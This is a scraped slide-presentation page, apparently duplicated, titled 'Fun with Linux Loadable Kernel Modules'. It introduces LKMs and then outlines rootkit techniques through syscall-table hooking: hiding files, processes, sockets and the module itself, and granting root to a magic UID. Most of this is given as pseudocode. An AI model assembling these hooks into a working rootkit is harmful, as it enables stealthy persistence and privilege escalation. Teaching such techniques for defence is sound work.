logging in or signing up Fun With LKMs Haggrid Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 540 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: June 15, 2007 This Presentation is Public Favorites: 1 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript Fun with Linux Loadable Kernel Modules (LKMs) : Fun with Linux Loadable Kernel Modules (LKMs) Biswajit Paul andamp; Dinakara K { biswajit, dinu } @cair.res.in Scientist, CAIR ( DRDO ) Bangalore, INDIA Motivation : Motivation Fun with Linux Loadable Kernel Modules (LKMs) Information Gathering Attack Launching Retaining Access Hide my files andamp; directories Do not show my prog in running Hide Socket Conn open by me. Do not update ’modify time’ stamp of file replaced be me. Always give me root privilege Root login without password Gather all password used over network Fig: Three Phases of typical cyber attack One of the way of achieving these is using LKM i Overview: Overview Fun with Linux Loadable Kernel Modules (LKMs) PART – I Introduction to LKM PART – II Hacking using LKM Slide4: Fun with Linux Loadable Kernel Modules (LKMs) PART – I Introduction to LKM Module Basics: Module Basics Fun with Linux Loadable Kernel Modules (LKMs) Linux Loadable Kernel Modules (LKMs) is a frame work allows one to add or remove code, on-the-fly into the running kernel. Why this frame work ? Most systems do not use all kernel function all the time Loadable modules allow for kernel function which are used less to be loaded and unloaded as and when required. Eg device drivers. Advantage : Smaller than a monolithic kernel so saves Kernel memory. Kernel can be modified on the fly without recompiling it A sample LKM: A sample LKM Fun with Linux Loadable Kernel Modules (LKMs) #includeandlt;linux/module.handgt; #includeandlt;linux/kernel.handgt; int init_module(void){ /* Use for all initialization */ printk(KERN_INFO '\n The LKM is loaded\n'); return 0; } void cleanup_module(void){ /* Use for clean shutdown */ printk(KERN_INFO '\n The LKM is removed \n'); } Compile : gcc –D__KERNEL__ -DMODULE –c –Wall –I /usr/src/linuc/include lkm.c Useful Macros & admin utilites: Useful Macros andamp; admin utilites Fun with Linux Loadable Kernel Modules (LKMs) Macros: MODULE_AUTHOR(' Biswajit and Dinakara'); MODULE_DESCRIPTION('Test LKM'); MODULE_LICENCE('GPL'); MODULE_PARAM('module_name,'param_1'); EXPORT_SYMBOL('symbol_1'); ADMIN Utilities: Insert : insmod andlt;module_name.oandgt; Remove : rmmod andlt;modue_nameandgt; View : lsmod Slide8: Fun with Linux Loadable Kernel Modules (LKMs) PART – II Hacking Using LKM How LKM is exploited ? : Fun with Linux Loadable Kernel Modules (LKMs) How LKM is exploited ? User Space Utilities ( ls, ps, netstat, su …) Sys_call_table Original System call handler New System call handler 2 1 252 System Call (SYS_stat, SYS_getuid … One of the way of exploiting LKM is System Call replacement System Call Replacement: Fun with Linux Loadable Kernel Modules (LKMs) System Call Replacement #includeandlt;linux/module.handgt; #includeandlt;linux/kernel.handgt; #includeandlt;sys/syscall.handgt; int *sys_call_table= andlt;address of sys_call_tableandgt;; int (*org_syscall)(arg1, arg2, …); int new_syscall(arg1, arg2,…){ /* Manupulate Here */ return(0); } int init_module(void){ org_syscall=sys_call_table[SYSCALL NO]; sys_call_table[SYSCALL NO]=new_syscall; return(0); } void cleanup_module(void){ sys_call_table[SYSCALL NO]=org_syscall; } Issues in resolving “sys_call_table” symbol: Fun with Linux Loadable Kernel Modules (LKMs) Issues in resolving 'sys_call_table' symbol If it is exported (kernelandlt;2.4.18) cat /proc/ksyms|egrep sys_call_table ) let insmod resolve the symbol while loading II If /boot/System.map is available cat /boot/System.map |egrep sys_call_table ) and hardcode the address found III Sys_call_table=system_utsname; while(i) { if(sys_table[__NR_read] == (unsigned long)sys_read) { sys_call_table=sys_table; flag=1; break; } i--; sys_table++; } Hack 1: Hiding File Name: Fun with Linux Loadable Kernel Modules (LKMs) Hack 1: Hiding File Name System Call to be replaced : sys_getdents int new_sys_getdents (unsigned int fd, struct dirent *dirp, unsigned int cnt ) { /* Pseudo code */ if( dirp-andgt;d_name matches with 'hide_file') return(0) else call orginal sys_getdents return(0); } Hack 2: Hiding Full File Contents: Fun with Linux Loadable Kernel Modules (LKMs) Hack 2: Hiding Full File Contents System Call to be replaced : sys_open int new_sys_open ( const char *pathname, int flag, mode_t mode) { /* Pseudo code */ if( pathname matches with 'hide_file') return(0) else call orginal sys_open return(0); } Hack 3: Filtering data while writing into File: Fun with Linux Loadable Kernel Modules (LKMs) Hack 3: Filtering data while writing into File System Call to be replaced : sys_write int new_sys_write (unsigned int fd, char *buf, unsigned int count) { /* Pseudo code */ if( buff matches with 'pattern') return(0) else call orginal sys_write return(0); } Hack 4: Avoid any file ownership Check: Fun with Linux Loadable Kernel Modules (LKMs) Hack 4: Avoid any file ownership Check System Call to be replaced : sys_getuid int new_sys_getuid (uid_t uid) { /* Pseudo code */ if (uid == MAGICUID) { current-andgt;uid = 0;current-andgt;euid = 0; /*(SuperUser)*/ current-andgt;gid = 0; current-andgt;egid = 0; return 0; } else call orginal sys_write return(0); } Hack 5: Process Hiding: Fun with Linux Loadable Kernel Modules (LKMs) Hack 5: Process Hiding System Call to be replaced : sys_getdents /* Pseudo code */ scan task structure to get PID from process name. Hide the directory corresponding to the PID in /proc. Hack 6: Hiding Open Socket Connection: Fun with Linux Loadable Kernel Modules (LKMs) Hack 6: Hiding Open Socket Connection System Call to be replaced : None /* Pseudo code */ Goto the /proc/net/tcp file. Modily the seq_show field of tcp_seq_afinfo structure Hack 7: Hiding our LKM : Fun with Linux Loadable Kernel Modules (LKMs) Hack 7: Hiding our LKM System Call to be replaced : sys_init_module int new_init_module() { /* Pseudo code */ register struct module *mp asm('%ebp'); *(char*)mp-andgt;name=0; mp-andgt;size=0; mp-andgt;ref=0; } Slide19: Thank You Biswajit Paul andamp; Dinakara K { biswajit, dinu } @cair.res.in You do not have the permission to view this presentation. In order to view it, please contact the author of the presentation.
Fun With LKMs Haggrid Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 540 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: June 15, 2007 This Presentation is Public Favorites: 1 Presentation Description No description available. Comments Posting comment... Premium member Presentation Transcript Fun with Linux Loadable Kernel Modules (LKMs) : Fun with Linux Loadable Kernel Modules (LKMs) Biswajit Paul andamp; Dinakara K { biswajit, dinu } @cair.res.in Scientist, CAIR ( DRDO ) Bangalore, INDIA Motivation : Motivation Fun with Linux Loadable Kernel Modules (LKMs) Information Gathering Attack Launching Retaining Access Hide my files andamp; directories Do not show my prog in running Hide Socket Conn open by me. Do not update ’modify time’ stamp of file replaced be me. Always give me root privilege Root login without password Gather all password used over network Fig: Three Phases of typical cyber attack One of the way of achieving these is using LKM i Overview: Overview Fun with Linux Loadable Kernel Modules (LKMs) PART – I Introduction to LKM PART – II Hacking using LKM Slide4: Fun with Linux Loadable Kernel Modules (LKMs) PART – I Introduction to LKM Module Basics: Module Basics Fun with Linux Loadable Kernel Modules (LKMs) Linux Loadable Kernel Modules (LKMs) is a frame work allows one to add or remove code, on-the-fly into the running kernel. Why this frame work ? Most systems do not use all kernel function all the time Loadable modules allow for kernel function which are used less to be loaded and unloaded as and when required. Eg device drivers. Advantage : Smaller than a monolithic kernel so saves Kernel memory. Kernel can be modified on the fly without recompiling it A sample LKM: A sample LKM Fun with Linux Loadable Kernel Modules (LKMs) #includeandlt;linux/module.handgt; #includeandlt;linux/kernel.handgt; int init_module(void){ /* Use for all initialization */ printk(KERN_INFO '\n The LKM is loaded\n'); return 0; } void cleanup_module(void){ /* Use for clean shutdown */ printk(KERN_INFO '\n The LKM is removed \n'); } Compile : gcc –D__KERNEL__ -DMODULE –c –Wall –I /usr/src/linuc/include lkm.c Useful Macros & admin utilites: Useful Macros andamp; admin utilites Fun with Linux Loadable Kernel Modules (LKMs) Macros: MODULE_AUTHOR(' Biswajit and Dinakara'); MODULE_DESCRIPTION('Test LKM'); MODULE_LICENCE('GPL'); MODULE_PARAM('module_name,'param_1'); EXPORT_SYMBOL('symbol_1'); ADMIN Utilities: Insert : insmod andlt;module_name.oandgt; Remove : rmmod andlt;modue_nameandgt; View : lsmod Slide8: Fun with Linux Loadable Kernel Modules (LKMs) PART – II Hacking Using LKM How LKM is exploited ? : Fun with Linux Loadable Kernel Modules (LKMs) How LKM is exploited ? User Space Utilities ( ls, ps, netstat, su …) Sys_call_table Original System call handler New System call handler 2 1 252 System Call (SYS_stat, SYS_getuid … One of the way of exploiting LKM is System Call replacement System Call Replacement: Fun with Linux Loadable Kernel Modules (LKMs) System Call Replacement #includeandlt;linux/module.handgt; #includeandlt;linux/kernel.handgt; #includeandlt;sys/syscall.handgt; int *sys_call_table= andlt;address of sys_call_tableandgt;; int (*org_syscall)(arg1, arg2, …); int new_syscall(arg1, arg2,…){ /* Manupulate Here */ return(0); } int init_module(void){ org_syscall=sys_call_table[SYSCALL NO]; sys_call_table[SYSCALL NO]=new_syscall; return(0); } void cleanup_module(void){ sys_call_table[SYSCALL NO]=org_syscall; } Issues in resolving “sys_call_table” symbol: Fun with Linux Loadable Kernel Modules (LKMs) Issues in resolving 'sys_call_table' symbol If it is exported (kernelandlt;2.4.18) cat /proc/ksyms|egrep sys_call_table ) let insmod resolve the symbol while loading II If /boot/System.map is available cat /boot/System.map |egrep sys_call_table ) and hardcode the address found III Sys_call_table=system_utsname; while(i) { if(sys_table[__NR_read] == (unsigned long)sys_read) { sys_call_table=sys_table; flag=1; break; } i--; sys_table++; } Hack 1: Hiding File Name: Fun with Linux Loadable Kernel Modules (LKMs) Hack 1: Hiding File Name System Call to be replaced : sys_getdents int new_sys_getdents (unsigned int fd, struct dirent *dirp, unsigned int cnt ) { /* Pseudo code */ if( dirp-andgt;d_name matches with 'hide_file') return(0) else call orginal sys_getdents return(0); } Hack 2: Hiding Full File Contents: Fun with Linux Loadable Kernel Modules (LKMs) Hack 2: Hiding Full File Contents System Call to be replaced : sys_open int new_sys_open ( const char *pathname, int flag, mode_t mode) { /* Pseudo code */ if( pathname matches with 'hide_file') return(0) else call orginal sys_open return(0); } Hack 3: Filtering data while writing into File: Fun with Linux Loadable Kernel Modules (LKMs) Hack 3: Filtering data while writing into File System Call to be replaced : sys_write int new_sys_write (unsigned int fd, char *buf, unsigned int count) { /* Pseudo code */ if( buff matches with 'pattern') return(0) else call orginal sys_write return(0); } Hack 4: Avoid any file ownership Check: Fun with Linux Loadable Kernel Modules (LKMs) Hack 4: Avoid any file ownership Check System Call to be replaced : sys_getuid int new_sys_getuid (uid_t uid) { /* Pseudo code */ if (uid == MAGICUID) { current-andgt;uid = 0;current-andgt;euid = 0; /*(SuperUser)*/ current-andgt;gid = 0; current-andgt;egid = 0; return 0; } else call orginal sys_write return(0); } Hack 5: Process Hiding: Fun with Linux Loadable Kernel Modules (LKMs) Hack 5: Process Hiding System Call to be replaced : sys_getdents /* Pseudo code */ scan task structure to get PID from process name. Hide the directory corresponding to the PID in /proc. Hack 6: Hiding Open Socket Connection: Fun with Linux Loadable Kernel Modules (LKMs) Hack 6: Hiding Open Socket Connection System Call to be replaced : None /* Pseudo code */ Goto the /proc/net/tcp file. Modily the seq_show field of tcp_seq_afinfo structure Hack 7: Hiding our LKM : Fun with Linux Loadable Kernel Modules (LKMs) Hack 7: Hiding our LKM System Call to be replaced : sys_init_module int new_init_module() { /* Pseudo code */ register struct module *mp asm('%ebp'); *(char*)mp-andgt;name=0; mp-andgt;size=0; mp-andgt;ref=0; } Slide19: Thank You Biswajit Paul andamp; Dinakara K { biswajit, dinu } @cair.res.in